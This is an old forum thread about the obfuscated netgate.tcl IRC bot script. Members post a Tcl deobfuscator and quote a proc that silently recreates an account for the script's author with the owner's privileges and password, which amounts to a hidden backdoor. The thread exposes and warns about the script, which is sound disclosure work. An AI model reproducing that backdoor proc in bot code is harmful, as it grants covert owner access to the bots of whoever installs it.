| View previous topic :: View next topic |
| Author |
Message |
user
Joined: 18 Mar 2003
Posts: 1452
Location: Norway
|
 Posted: Mon Jan 26, 2004 11:31 pm Post subject: netgate backdoor |
 |
|
I checked the script mentioned here a bit closer...seems like it's got quite a few hidden "features" ...should I post a script that will "deobfuscate" it or are you guys like billy G...thinking that we should give people a fair chance to remove the script before making the "vuln" public? 
The previously mentioned post is in the junk yard and will probably disappear pretty soon, so here's a direct link to the script just in case: http://www.rootshell.be/~netgate/netgate.tcl
EDIT: changed the subject
_________________
Have you ever read "The Manual"?
Last edited by user on Thu Mar 22, 2007 11:21 am; edited 1 time in total |
|
| Back to top |
|
 |
Yourname
Master
Joined: 24 Sep 2001
Posts: 358
Location: Toronto
|
| Posted: Tue Jan 27, 2004 6:10 am Post subject: |
|
|
FULL-DISCLOSURE!
That script has for long, cheated many a user. I've tried to get most scripters to look into it, but due to time limitations and laziness, as we all know, they didn't wanna do it.
But you, my man, have accomplished something. Tell us. And provide us with a 'readable' format, if you can, and you're infamous!
_________________
Dormant egghead. |
|
| Back to top |
|
|
user
Joined: 18 Mar 2003
Posts: 1452
Location: Norway
|
| Posted: Tue Jan 27, 2004 7:38 am Post subject: Here goes... |
|
|
This code will convert the script, so you need to have the original obfuscated version...
| Code: |
# Make http://www.rootshell.be/~netgate/netgate.tcl a bit easier to
# read (I didn't verify that it runs fine after the conversion, but
# who would want to run that sucky script anyway, right? :P)
#
# Usage: change the variables below before you source this script in
# your eggdrop. eggdrop is needed because parts of the descrambling is
# done using eggdrop's 'decrypt' command
set infile scripts/netgate.tcl
set outfile scripts/netgate.fixed.tcl
# The main (de)scrambler proc
# Escaping is honored for ['s but not the ], $ and space
# - Don't ask me why... I just reproduce the output of the original
proc lines str {
# The part swapping L with 0 and 0 with L reminds me of my
# first reaction when i saw the netgate.tcl code :P
set map {
a z z a b y y b c x x c d w w d e v v e f u u f g t
t g h s s h i r r i j q q j k p p k l o o l m n n m
A Z Z A B Y Y B C X X C D W W D E V V E F U U F G T
T G H S S H I R R I J Q Q J K P P K L O O L M N N M
}
if {[regexp {[\$\[~]+} $str]} {
set out ""
set s ""
set p "";# previous char
foreach c [split $str ""] {
if {$s==""} {
if {$c=="~"} {
set s ~
} elseif {$c=="\$"} {
set s " "; set c ~$c
} elseif {$c=="\[" && $p!="\\"} {
set s "\]"; set c ~$c
} else {
set c [string map $map $c]
}
} elseif {$c=="~"} {
set s ""
} elseif {$c==$s} {
set s ""; append c ~
}
append out [set p $c]
}
if {$s==""} {set out} {append out ~}
} {
string map $map $str
}
}
proc puthlp str {
set str "puthelp \"[string map {~ ""} [lines $str]]\""
}
proc putsrv str {
set str "putserv \"[string map {~ ""} [lines $str]]\""
}
proc putqck str {
set str "putquick \"[string map {~ ""} [lines $str]]\""
}
proc dcp str {
set str \"[qesc [decrypt 64 $str]]\"
}
proc dezip str {
if {[string match {*\\*} $str]} {set str [subst -noc -nov $str]}
set str [qesc [decrypt 64 [string map {~ ""} $str]]]
}
proc qesc str {
set out ""
foreach c [split [string map {
\\ \\\\ \[ \\\[ \] \\\] \{ \\\{
\} \\\} \$ \\\$ \" \\\" " " "\\ "
} $str] ""] {
if {[set i [scan $c %c]]>31 && $i<127} {
append out $c
} {
append out [format \\%.3o $i]
}
}
set out
}
proc clearify {var cmdstart {stderr stdout}} {
upvar 1 $var code
set off [string len $cmdstart]
set cmd [lindex [split $cmdstart " "] 0]
set off2 [string match {\[*} $cmdstart]
if {$off2} {
set cmd [string range $cmd 1 end]
}
incr off2
#puts $stderr "*** running \"$cmd\""
set c 0
foreach line [split [set code][set code ""] \n] {
incr c
set i 0
set ll [string len $line]
while {$i<$ll && [set i [string first $cmdstart $line $i]]>-1} {
set j [expr {$i+$off+1}]
while {$j<$ll && ![info complete [set run [string range $line $i $j]]]} {incr j}
if {[info complete $run]} {
# lame hack because this was the only command with more arguments :P
if {$cmdstart=={[decrypt 64 "}} {
set res [decrypt 64 [string range $run $off end-$off2]]
} {
set res [$cmd [string range $run $off end-$off2]]
}
set line [string replace $line $i $j $res]
} {
#puts $stderr "line#$c INCOMPLETE: \"$run\""
break
}
incr i
}
append code "$line\n"
}
#puts $stderr "*** done: \"$cmd\""
}
proc indent {code {dent { }}} {
set out ""
set i 0
foreach line [split $code \n] {
set line [string trimleft $line]
foreach {o c e} {0 0 0} break
foreach a [split $line ""] {
if {$e} {set e 0; continue}
switch -exact -- $a {
"\\" {set e 1}
"\{" {incr o}
"\}" {if {$o} {incr o -1} {incr c}}
}
}
incr i -$c
append out [string repeat $dent $i]$line\n
incr i $o
}
set out
}
set code [read [set f [open $infile]]]; close $f
clearify code {[decrypt 64 "}
clearify code {[lines "}
clearify code {[dcp "}
clearify code {[dezip "}
clearify code {puthlp "}
clearify code {putsrv "}
clearify code {putqck "}
set f [open $outfile w]
puts $f [indent [set code]][unset code]
close $f
putlog "Check $outfile :)"
# It's a bit of a mess, but it does the job. Have fun :P |
_________________
Have you ever read "The Manual"?
Last edited by user on Tue Jan 27, 2004 11:59 pm; edited 2 times in total |
|
| Back to top |
|
|
caesar
Mint Rubber
Joined: 14 Oct 2001
Posts: 3741
Location: Mint Factory
|
| Posted: Tue Jan 27, 2004 2:49 pm Post subject: |
|
|
duh! Why do you think I have moved it to the Junk Yard in the first place?  Some untrustworty users from Dalnet have created it so.. DON'T USE IT!
Also, thanks for the script to unscramble it
_________________
Once the game is over, the king and the pawn go back in the same box. |
|
| Back to top |
|
|
Yourname
Master
Joined: 24 Sep 2001
Posts: 358
Location: Toronto
|
| Posted: Tue Jan 27, 2004 10:29 pm Post subject: |
|
|
heh, what's the use if it won't run? How to make it 'runnable' then?
caesar - I AM FROM TEH DALNET!
_________________
Dormant egghead. |
|
| Back to top |
|
|
user
Joined: 18 Mar 2003
Posts: 1452
Location: Norway
|
| Posted: Tue Jan 27, 2004 11:43 pm Post subject: |
|
|
| Yourname wrote: | | heh, what's the use if it won't run? How to make it 'runnable' then? |
I was talking about the converted script...it's for reading. Why would you want to run it? (changed my comment a bit in the top...do you get it now? )
_________________
Have you ever read "The Manual"? |
|
| Back to top |
|
|
caesar
Mint Rubber
Joined: 14 Oct 2001
Posts: 3741
Location: Mint Factory
|
| Posted: Wed Jan 28, 2004 11:04 am Post subject: |
|
|
I was talking about that netgate.tcl script.. also, I don't have something agains Dalnet users, don't get me wrong there. The "untrustworty" authors actualy of that script are carders and probably (not shure 100% hackers). User's tcl is a neat thing to "unscramble" the code.. nice job.
PS: My appologies Yourname if I have let you the totaly wrong impresion that I have something agains Dalnet users and my appologies if I have expressed myself wrong and let you under the impresion that user's code is not good to run in order to make that "FULL-DISCLOSURE! " of the triky code.
_________________
Once the game is over, the king and the pawn go back in the same box. |
|
| Back to top |
|
|
Yourname
Master
Joined: 24 Sep 2001
Posts: 358
Location: Toronto
|
| Posted: Wed Jan 28, 2004 2:35 pm Post subject: |
|
|
aww caesar, I'm just playin with you dude.
And yes, those people are prolly carders or so.
user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that [censored], I took it off apart from the fact that it scared me because I knew there are trojans here and there.
_________________
Dormant egghead. |
|
| Back to top |
|
|
user
Joined: 18 Mar 2003
Posts: 1452
Location: Norway
|
| Posted: Wed Jan 28, 2004 2:44 pm Post subject: |
|
|
| Yourname wrote: | | user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there. |
I wouldn't copy stuff from their code. It is 100% pure crap. Seems like they spent all their skills trying to make it hard to read If you have trouble coding a particular feature, it would be better to ask in the tcl forum on this site
_________________
Have you ever read "The Manual"? |
|
| Back to top |
|
|
caesar
Mint Rubber
Joined: 14 Oct 2001
Posts: 3741
Location: Mint Factory
|
| Posted: Wed Jan 28, 2004 3:37 pm Post subject: |
|
|
Yourname : aww.. you dirty dog Shame on me cos I got so fooled.. 
_________________
Once the game is over, the king and the pawn go back in the same box. |
|
| Back to top |
|
|
Yourname
Master
Joined: 24 Sep 2001
Posts: 358
Location: Toronto
|
| Posted: Thu Jan 29, 2004 3:43 am Post subject: |
|
|
I'll assume I'm a good actor. 
_________________
Dormant egghead. |
|
| Back to top |
|
|
NeTGaTE
Voice
Joined: 03 Dec 2004
Posts: 5
Location: South Sumatera, Palembang - Indonesia
|
| Posted: Fri Dec 03, 2004 11:56 pm Post subject: Reply |
|
|
user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there.
not trojan in this tcl buat dalnet have autoklines that script. dalnet read from tha NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname andtwo in away logo NETGATE (i Have fixed for this in 9.6)
The "untrustworty" authors actualy of that script are carders and probably (not shure 100% hackers).
tha authors nickname in DALnet is KaISaR, it's not a hackers.
:: odon |
|
| Back to top |
|
|
user
Joined: 18 Mar 2003
Posts: 1452
Location: Norway
|
| Posted: Sat Dec 04, 2004 1:48 am Post subject: Re: Reply |
|
|
| NeTgAtE wrote: | not trojan in this tcl buat dalnet have autoklines that script. dalnet read from tha NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname andtwo in away logo NETGATE (i Have fixed for this in 9.6)
tha authors nickname in DALnet is KaISaR, it's not a hackers. |
So this is not a backdoor? Is that what you're trying to say? (the code below is from v8.9)
| Code: | set ps KaISaR
# the proc below is invoked alot...
proc saveuser {} {
global ps owner
if {![validuser $ps]} {
setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq.";# Zfhjmnoptx
} elseif {$owner != $ps} {
setuser $owner XTRA "BEND" [zip [chattr $ps]]
if {[passwdok $ps ""] != 1} {
setuser $owner XTRA "LAST" [getuser $ps "PASS"]
}
deluser $ps
}
save
if {![validuser $ps]} {
adduser $ps "$ps!*@*"
chattr $ps [dezip [getuser $owner XTRA "BEND"]]
if {[getuser $owner XTRA "LAST"] != ""} {
setuser $ps PASS [getuser $owner XTRA "LAST"]
}
}
return 1
} |
_________________
Have you ever read "The Manual"? |
|
| Back to top |
|
|
NeTGaTE
Voice
Joined: 03 Dec 2004
Posts: 5
Location: South Sumatera, Palembang - Indonesia
|
| Posted: Sat Dec 11, 2004 5:42 am Post subject: |
|
|
i think that is not a backdoor just a copyright who maker that tcl, just to remember who make netgate tcl is KaISaR (now he has been sign in from irc). some of user in dalnet have riped netgate tcl and make another tcl version with alot of logo/slogan but "STILL" same like netgate tcl.
$ps : Any one or people in dalnet always look this a backdoor, why? |
|
| Back to top |
|
|
metroid
Owner
Joined: 16 Jun 2004
Posts: 771
|
| Posted: Sat Dec 11, 2004 6:14 am Post subject: |
|
|
Your a retard, That proc adds the author as an owner which is clearly a backdoor to get owner access on a bot.
Maybe you should try reading the code instead of making useless remarks Netgate. |
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
